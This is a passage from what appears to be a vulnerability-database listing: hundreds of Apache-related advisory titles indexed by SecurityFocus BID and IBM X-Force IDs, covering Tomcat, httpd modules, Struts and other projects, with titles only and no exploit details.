7403| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
7404| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
7405| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
7406| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
7407| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
7408| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
7409| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
7410| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
7411| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
7412| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
7413| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
7414| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
7415| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
7416| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
7417| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
7418| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
7419| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
7420| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
7421| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
7422| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
7423| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
7424| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
7425| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
7426| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
7427| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
7428| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
7429| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
7430| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
7431| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
7432| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
7433| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
7434| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
7435| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7436| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
7437| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
7438| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
7439| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
7440| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
7441| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
7442| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
7443| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
7444| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
7445| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
7446| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
7447| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
7448| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
7449| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
7450| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
7451| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
7452| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
7453| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
7454| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
7455| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
7456| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7457| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
7458| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
7459| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
7460| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
7461| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
7462| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
7463| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
7464| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
7465| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
7466| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
7467| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
7468| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
7469| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
7470| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
7471| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
7472| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
7473| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
7474| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
7475| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
7476| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
7477| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
7478| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
7479| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
7480| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
7481| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
7482| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
7483| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
7484| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
7485| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
7486| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
7487| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
7488| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
7489| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
7490| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
7491| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
7492| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
7493| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
7494| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
7495| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
7496| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
7497| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
7498| [20527] Apache Mod_TCL Remote Format String Vulnerability
7499| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
7500| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
7501| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
7502| [19106] Apache Tomcat Information Disclosure Vulnerability
7503| [18138] Apache James SMTP Denial Of Service Vulnerability
7504| [17342] Apache Struts Multiple Remote Vulnerabilities
7505| [17095] Apache Log4Net Denial Of Service Vulnerability
7506| [16916] Apache mod_python FileSession Code Execution Vulnerability
7507| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
7508| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
7509| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
7510| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
7511| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
7512| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
7513| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
7514| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
7515| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
7516| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
7517| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
7518| [15177] PHP Apache 2 Local Denial of Service Vulnerability
7519| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
7520| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
7521| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
7522| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
7523| [14106] Apache HTTP Request Smuggling Vulnerability
7524| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
7525| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
7526| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
7527| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
7528| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
7529| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
7530| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
7531| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
7532| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
7533| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
7534| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
7535| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
7536| [11471] Apache mod_include Local Buffer Overflow Vulnerability
7537| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
7538| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
7539| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
7540| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
7541| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
7542| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
7543| [11094] Apache mod_ssl Denial Of Service Vulnerability
7544| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
7545| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
7546| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
7547| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
7548| [10478] ClueCentral Apache Suexec Patch Security Weakness
7549| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
7550| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
7551| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
7552| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
7553| [9921] Apache Connection Blocking Denial Of Service Vulnerability
7554| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
7555| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
7556| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
7557| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
7558| [9733] Apache Cygwin Directory Traversal Vulnerability
7559| [9599] Apache mod_php Global Variables Information Disclosure Weakness
7560| [9590] Apache-SSL Client Certificate Forging Vulnerability
7561| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
7562| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
7563| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
7564| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
7565| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
7566| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
7567| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
7568| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
7569| [8898] Red Hat Apache Directory Index Default Configuration Error
7570| [8883] Apache Cocoon Directory Traversal Vulnerability
7571| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
7572| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
7573| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
7574| [8707] Apache htpasswd Password Entropy Weakness
7575| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
7576| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
7577| [8226] Apache HTTP Server Multiple Vulnerabilities
7578| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
7579| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
7580| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
7581| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
7582| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
7583| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
7584| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
7585| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
7586| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
7587| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
7588| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
7589| [7255] Apache Web Server File Descriptor Leakage Vulnerability
7590| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
7591| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
7592| [6939] Apache Web Server ETag Header Information Disclosure Weakness
7593| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
7594| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
7595| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
7596| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
7597| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
7598| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
7599| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
7600| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
7601| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
7602| [6117] Apache mod_php File Descriptor Leakage Vulnerability
7603| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
7604| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
7605| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
7606| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
7607| [5992] Apache HTDigest Insecure Temporary File Vulnerability
7608| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
7609| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
7610| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
7611| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
7612| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
7613| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7614| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
7615| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
7616| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
7617| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
7618| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7619| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
7620| [5485] Apache 2.0 Path Disclosure Vulnerability
7621| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7622| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
7623| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
7624| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
7625| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
7626| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
7627| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
7628| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
7629| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
7630| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
7631| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
7632| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
7633| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
7634| [4437] Apache Error Message Cross-Site Scripting Vulnerability
7635| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
7636| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
7637| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
7638| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
7639| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
7640| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
7641| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
7642| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
7643| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
7644| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
7645| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
7646| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
7647| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
7648| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
7649| [3596] Apache Split-Logfile File Append Vulnerability
7650| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
7651| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
7652| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
7653| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
7654| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
7655| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
7656| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
7657| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
7658| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
7659| [3169] Apache Server Address Disclosure Vulnerability
7660| [3009] Apache Possible Directory Index Disclosure Vulnerability
7661| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
7662| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
7663| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
7664| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
7665| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
7666| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
7667| [2216] Apache Web Server DoS Vulnerability
7668| [2182] Apache /tmp File Race Vulnerability
7669| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
7670| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
7671| [1821] Apache mod_cookies Buffer Overflow Vulnerability
7672| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
7673| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
7674| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
7675| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
7676| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
7677| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
7678| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
7679| [1457] Apache::ASP source.asp Example Script Vulnerability
7680| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
7681| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
7682|
7683| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7684| [86258] Apache CloudStack text fields cross-site scripting
7685| [85983] Apache Subversion mod_dav_svn module denial of service
7686| [85875] Apache OFBiz UEL code execution
7687| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
7688| [85871] Apache HTTP Server mod_session_dbd unspecified
7689| [85756] Apache Struts OGNL expression command execution
7690| [85755] Apache Struts DefaultActionMapper class open redirect
7691| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
7692| [85574] Apache HTTP Server mod_dav denial of service
7693| [85573] Apache Struts Showcase App OGNL code execution
7694| [85496] Apache CXF denial of service
7695| [85423] Apache Geronimo RMI classloader code execution
7696| [85326] Apache Santuario XML Security for C++ buffer overflow
7697| [85323] Apache Santuario XML Security for Java spoofing
7698| [85319] Apache Qpid Python client SSL spoofing
7699| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
7700| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
7701| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
7702| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
7703| [84952] Apache Tomcat CVE-2012-3544 denial of service
7704| [84763] Apache Struts CVE-2013-2135 security bypass
7705| [84762] Apache Struts CVE-2013-2134 security bypass
7706| [84719] Apache Subversion CVE-2013-2088 command execution
7707| [84718] Apache Subversion CVE-2013-2112 denial of service
7708| [84717] Apache Subversion CVE-2013-1968 denial of service
7709| [84577] Apache Tomcat security bypass
7710| [84576] Apache Tomcat symlink
7711| [84543] Apache Struts CVE-2013-2115 security bypass
7712| [84542] Apache Struts CVE-2013-1966 security bypass
7713| [84154] Apache Tomcat session hijacking
7714| [84144] Apache Tomcat denial of service
7715| [84143] Apache Tomcat information disclosure
7716| [84111] Apache HTTP Server command execution
7717| [84043] Apache Virtual Computing Lab cross-site scripting
7718| [84042] Apache Virtual Computing Lab cross-site scripting
7719| [83782] Apache CloudStack information disclosure
7720| [83781] Apache CloudStack security bypass
7721| [83720] Apache ActiveMQ cross-site scripting
7722| [83719] Apache ActiveMQ denial of service
7723| [83718] Apache ActiveMQ denial of service
7724| [83263] Apache Subversion denial of service
7725| [83262] Apache Subversion denial of service
7726| [83261] Apache Subversion denial of service
7727| [83259] Apache Subversion denial of service
7728| [83035] Apache mod_ruid2 security bypass
7729| [82852] Apache Qpid federation_tag security bypass
7730| [82851] Apache Qpid qpid::framing::Buffer denial of service
7731| [82758] Apache Rave User RPC API information disclosure
7732| [82663] Apache Subversion svn_fs_file_length() denial of service
7733| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
7734| [82641] Apache Qpid AMQP denial of service
7735| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
7736| [82618] Apache Commons FileUpload symlink
7737| [82360] Apache HTTP Server manager interface cross-site scripting
7738| [82359] Apache HTTP Server hostnames cross-site scripting
7739| [82338] Apache Tomcat log/logdir information disclosure
7740| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
7741| [82268] Apache OpenJPA deserialization command execution
7742| [81981] Apache CXF UsernameTokens security bypass
7743| [81980] Apache CXF WS-Security security bypass
7744| [81398] Apache OFBiz cross-site scripting
7745| [81240] Apache CouchDB directory traversal
7746| [81226] Apache CouchDB JSONP code execution
7747| [81225] Apache CouchDB Futon user interface cross-site scripting
7748| [81211] Apache Axis2/C SSL spoofing
7749| [81167] Apache CloudStack DeployVM information disclosure
7750| [81166] Apache CloudStack AddHost API information disclosure
7751| [81165] Apache CloudStack createSSHKeyPair API information disclosure
7752| [80518] Apache Tomcat cross-site request forgery security bypass
7753| [80517] Apache Tomcat FormAuthenticator security bypass
7754| [80516] Apache Tomcat NIO denial of service
7755| [80408] Apache Tomcat replay-countermeasure security bypass
7756| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
7757| [80317] Apache Tomcat slowloris denial of service
7758| [79984] Apache Commons HttpClient SSL spoofing
7759| [79983] Apache CXF SSL spoofing
7760| [79830] Apache Axis2/Java SSL spoofing
7761| [79829] Apache Axis SSL spoofing
7762| [79809] Apache Tomcat DIGEST security bypass
7763| [79806] Apache Tomcat parseHeaders() denial of service
7764| [79540] Apache OFBiz unspecified
7765| [79487] Apache Axis2 SAML security bypass
7766| [79212] Apache Cloudstack code execution
7767| [78734] Apache CXF SOAP Action security bypass
7768| [78730] Apache Qpid broker denial of service
7769| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
7770| [78563] Apache mod_pagespeed module unspecified cross-site scripting
7771| [78562] Apache mod_pagespeed module security bypass
7772| [78454] Apache Axis2 security bypass
7773| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
7774| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
7775| [78321] Apache Wicket unspecified cross-site scripting
7776| [78183] Apache Struts parameters denial of service
7777| [78182] Apache Struts cross-site request forgery
7778| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
7779| [77987] mod_rpaf module for Apache denial of service
7780| [77958] Apache Struts skill name code execution
7781| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
7782| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
7783| [77568] Apache Qpid broker security bypass
7784| [77421] Apache Libcloud spoofing
7785| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
7786| [77046] Oracle Solaris Apache HTTP Server information disclosure
7787| [76837] Apache Hadoop information disclosure
7788| [76802] Apache Sling CopyFrom denial of service
7789| [76692] Apache Hadoop symlink
7790| [76535] Apache Roller console cross-site request forgery
7791| [76534] Apache Roller weblog cross-site scripting
7792| [76152] Apache CXF elements security bypass
7793| [76151] Apache CXF child policies security bypass
7794| [75983] MapServer for Windows Apache file include
7795| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
7796| [75558] Apache POI denial of service
7797| [75545] PHP apache_request_headers() buffer overflow
7798| [75302] Apache Qpid SASL security bypass
7799| [75211] Debian GNU/Linux apache 2 cross-site scripting
7800| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
7801| [74871] Apache OFBiz FlexibleStringExpander code execution
7802| [74870] Apache OFBiz multiple cross-site scripting
7803| [74750] Apache Hadoop unspecified spoofing
7804| [74319] Apache Struts XSLTResult.java file upload
7805| [74313] Apache Traffic Server header buffer overflow
7806| [74276] Apache Wicket directory traversal
7807| [74273] Apache Wicket unspecified cross-site scripting
7808| [74181] Apache HTTP Server mod_fcgid module denial of service
7809| [73690] Apache Struts OGNL code execution
7810| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
7811| [73100] Apache MyFaces in directory traversal
7812| [73096] Apache APR hash denial of service
7813| [73052] Apache Struts name cross-site scripting
7814| [73030] Apache CXF UsernameToken security bypass
7815| [72888] Apache Struts lastName cross-site scripting
7816| [72758] Apache HTTP Server httpOnly information disclosure
7817| [72757] Apache HTTP Server MPM denial of service
7818| [72585] Apache Struts ParameterInterceptor security bypass
7819| [72438] Apache Tomcat Digest security bypass
7820| [72437] Apache Tomcat Digest security bypass
7821| [72436] Apache Tomcat DIGEST security bypass
7822| [72425] Apache Tomcat parameter denial of service
7823| [72422] Apache Tomcat request object information disclosure
7824| [72377] Apache HTTP Server scoreboard security bypass
7825| [72345] Apache HTTP Server HTTP request denial of service
7826| [72229] Apache Struts ExceptionDelegator command execution
7827| [72089] Apache Struts ParameterInterceptor directory traversal
7828| [72088] Apache Struts CookieInterceptor command execution
7829| [72047] Apache Geronimo hash denial of service
7830| [72016] Apache Tomcat hash denial of service
7831| [71711] Apache Struts OGNL expression code execution
7832| [71654] Apache Struts interfaces security bypass
7833| [71620] Apache ActiveMQ failover denial of service
7834| [71617] Apache HTTP Server mod_proxy module information disclosure
7835| [71508] Apache MyFaces EL security bypass
7836| [71445] Apache HTTP Server mod_proxy security bypass
7837| [71203] Apache Tomcat servlets privilege escalation
7838| [71181] Apache HTTP Server ap_pregsub() denial of service
7839| [71093] Apache HTTP Server ap_pregsub() buffer overflow
7840| [70336] Apache HTTP Server mod_proxy information disclosure
7841| [69804] Apache HTTP Server mod_proxy_ajp denial of service
7842| [69472] Apache Tomcat AJP security bypass
7843| [69396] Apache HTTP Server ByteRange filter denial of service
7844| [69394] Apache Wicket multi window support cross-site scripting
7845| [69176] Apache Tomcat XML information disclosure
7846| [69161] Apache Tomcat jsvc information disclosure
7847| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
7848| [68541] Apache Tomcat sendfile information disclosure
7849| [68420] Apache XML Security denial of service
7850| [68238] Apache Tomcat JMX information disclosure
7851| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
7852| [67804] Apache Subversion control rules information disclosure
7853| [67803] Apache Subversion control rules denial of service
7854| [67802] Apache Subversion baselined denial of service
7855| [67672] Apache Archiva multiple cross-site scripting
7856| [67671] Apache Archiva multiple cross-site request forgery
7857| [67564] Apache APR apr_fnmatch() denial of service
7858| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
